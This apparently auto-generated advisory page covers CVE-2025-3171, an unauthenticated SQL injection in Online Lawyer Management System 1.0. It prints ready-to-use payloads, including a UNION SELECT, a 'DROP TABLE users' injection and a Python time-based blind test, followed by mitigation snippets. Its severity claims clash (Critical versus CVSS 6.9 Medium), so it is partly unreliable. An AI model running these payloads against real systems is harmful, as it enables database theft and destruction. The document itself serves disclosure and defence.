How the CVE Works
The vulnerability (CVE-2025-3171) exists in the `/approve_lawyer.php` file of Project Worlds Online Lawyer Management System 1.0. An attacker can exploit this flaw by manipulating the `unblock_id` parameter, leading to unauthenticated SQL injection. Since the input is not sanitized, malicious SQL queries can be executed remotely, allowing unauthorized database access, data theft, or system compromise. The attack vector is network-based (AV:N) with low attack complexity (AC:L), requiring no privileges (PR:N) or user interaction (UI:N).
DailyCVE Form
Platform: Online Lawyer Management
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 04/08/2025
What Undercode Say:
Exploitation:
1. Craft Malicious Payload:
GET /approve_lawyer.php?unblock_id=1' UNION SELECT 1,2,3,4,user(),6-- -
2. Extract Database Info:
' OR 1=1; DROP TABLE users;--
3. Automated Exploit (Python):
import requests
target = "http://victim.com/approve_lawyer.php"
payload = {"unblock_id": "1' AND (SELECT 1 FROM (SELECT SLEEP(5))a)--"}
response = requests.get(target, params=payload)
if response.elapsed.total_seconds() > 4:
print("Vulnerable to SQLi")
Protection:
1. Input Sanitization:
$unblock_id = mysqli_real_escape_string($conn, $_GET['unblock_id']);
2. Use Prepared Statements:
$stmt = $conn->prepare("UPDATE lawyers SET status=? WHERE id=?");
$stmt->bind_param("si", $status, $unblock_id);
3. WAF Rules:
location ~ approve_lawyer.php {
deny all;
}
4. Patch Verification:
curl -I http://victim.com/approve_lawyer.php | grep "X-Patched"
5. Log Monitoring:
tail -f /var/log/apache2/access.log | grep "approve_lawyer.php"
Analytics:
- CVSS 4.0 Score: 6.9 (Medium)
- Attack Vector: Network (AV:N)
- Exploitability: Low Complexity (AC:L)
- Impact: Data Confidentiality (VC:L), Integrity (VI:L), Availability (VA:L)
- Zero-Day Status: Publicly Disclosed
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-3171
Extra Source Hub:
Undercode
